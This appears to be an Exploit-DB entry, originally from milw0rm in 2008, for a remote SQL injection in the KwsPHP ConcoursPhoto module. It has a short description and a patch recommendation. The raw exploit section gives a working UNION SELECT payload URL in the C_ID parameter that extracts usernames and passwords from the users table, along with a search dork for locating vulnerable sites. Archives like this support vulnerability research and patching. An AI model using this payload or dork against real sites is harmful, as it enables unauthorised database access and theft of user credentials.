KwsPHP Module ConcoursPhoto Remote SQL Injection Exploit

vendor:

Module ConcoursPhoto

by:

Stack-Terrorist

8.8

CVSS

HIGH

Remote SQL Injection

CWE

Product Name: Module ConcoursPhoto

Affected Version From: N/A

Affected Version To: N/A

Patch Exists: Yes

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2008

KwsPHP Module ConcoursPhoto Remote SQL Injection Exploit

An attacker can exploit a remote SQL injection vulnerability in KwsPHP Module ConcoursPhoto. The vulnerability is present in the 'C_ID' parameter of the 'index.php' script when 'mod' is set to 'ConcoursPhoto' and 'VIEW' is set to 'prix'. An attacker can exploit this vulnerability by sending a maliciously crafted HTTP request to the vulnerable script. This can allow the attacker to gain access to the database and execute arbitrary SQL commands.

Mitigation:

The vendor has released a patch to address this vulnerability. It is recommended to apply the patch as soon as possible.

Source

Exploit-DB raw data:

#########################################################################
    KwsPHP  Module ConcoursPhoto  Remote SQL Injection Exploit
#########################################################################

## AUTHOR :  Stack-Terrorist [v40]
## Email  :  admin@v4-team.com
## Home   :  http://v4-team.com & http://stack-terrorist.com
## Script : KwsPHP  Module ConcoursPhoto
## Bug : Remote SQL Injection Exploit
## Dork : inurl:index.php?mod=ConcoursPhoto

## EXPLOITS :

http://server.com/Path/index.php?mod=ConcoursPhoto&VIEW=prix&C_ID=-1/**/union/**/select/**/concat(pseudo,0x3a,pass)/**/from/**/users/**/where/**/id=1/*

## GREETZ  : All muslims Hackers
## speacial thnx to : str0ke

#########################################################################
                        Stack-Terrorist [v40]
#########################################################################

# milw0rm.com [2008-04-03]